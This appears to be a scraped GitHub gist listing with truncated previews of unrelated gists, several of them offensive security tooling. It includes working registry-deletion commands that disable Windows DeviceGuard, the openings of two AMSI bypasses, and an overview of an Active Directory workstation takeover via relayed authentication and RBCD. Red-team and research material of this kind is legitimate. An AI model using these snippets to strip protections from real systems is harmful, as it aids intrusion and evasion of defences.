💭
We work as a pair because there are two of us in my head ...

Computer button pusher // Autodidact since my childhood || SIN - SIN HACK - HACK || NO-CODE evangelist || Skiddie learning REDTEAMING - Black coffee like my sense of humor Saltinbank-SyS

@LuemmelSec
LuemmelSec / disabledevicegard.ps1
Created December 1, 2022 08:51
Disable DeviceGuard with UEFI lock
# Steps needed to disable DeviceGuard with UEFI lock
# Disable DeviceGuard in registry
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f'
cmd /c 'REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f'
# Change UEFI settings. Reboot and confirmation needed.
mountvol X: /s
@CCob
CCob / patchless_amsi.h
Created April 17, 2022 16:18
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
<#
Meta
Date: 2022 March 28th
Updated: 2023 October 6th
Authors: Dray Agha (Twitter @purp1ew0lf), Dipo Rodipe (Twitter @dipotwb)
Company: Huntress Labs
Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab.
#>
################################################################################################################
@wietze
wietze / mitre_attack.tex
Created January 31, 2022 18:29
MITRE ATT&CK - LaTeX functions
\usepackage{hyperref}
\usepackage{xstring}
\DeclareRobustCommand{\tid}[1]{\StrSubstitute{#1}{.}{/}[\temp]%
\href{https://attack.mitre.org/techniques/\temp/}{#1}}
% \tid{T1234} returns 'T1234' with a hyperlink to its MITRE ATT&CK page
\DeclareRobustCommand{\tidtext}[1]{\StrSubstitute{#1}{.}{/}[\temp]%
\href{https://attack.mitre.org/techniques/\temp/}{#1}: \gettid{#1}}
% \tidtext{T1234} returns 'T1234: Technique Name' with T1234 containing a hyperlink to its MITRE ATT&CK page
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active March 17, 2025 03:05
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@exocode
exocode / Quadcopter.md
Created January 3, 2021 19:55
My personal cheat sheet for UAV FPV and Betaflight. Everything you need!

Quadcopter and Betaflight cheat sheet

Introduction

On my journey through hundreds of videos, tutorials and manuals (Bardwell, UAV Tech, JohnnyFPV, Mr. Steele, Le Drib, RotorRiot (sorry, for the missed ones) and wrote down their suggestions). This is the result of my notes. It should provide the least necessary but most compressed information to start tuning and setting your Quadcopter. In my case I use the widely spread Taranis X7 remote control.

I am a freestyle pilot, so keep in mind, that these settings are in this scope (more smooth, softer flight behaviour).

Remote Control (Taranis X7)

google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue
@mohanpedala
mohanpedala / 1-way-ssl.jpg
Last active November 23, 2023 17:44
One-Way SSL and Two-Way SSL
@FatRodzianko
FatRodzianko / my-am-bypass.ps1
Last active February 7, 2025 22:31
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]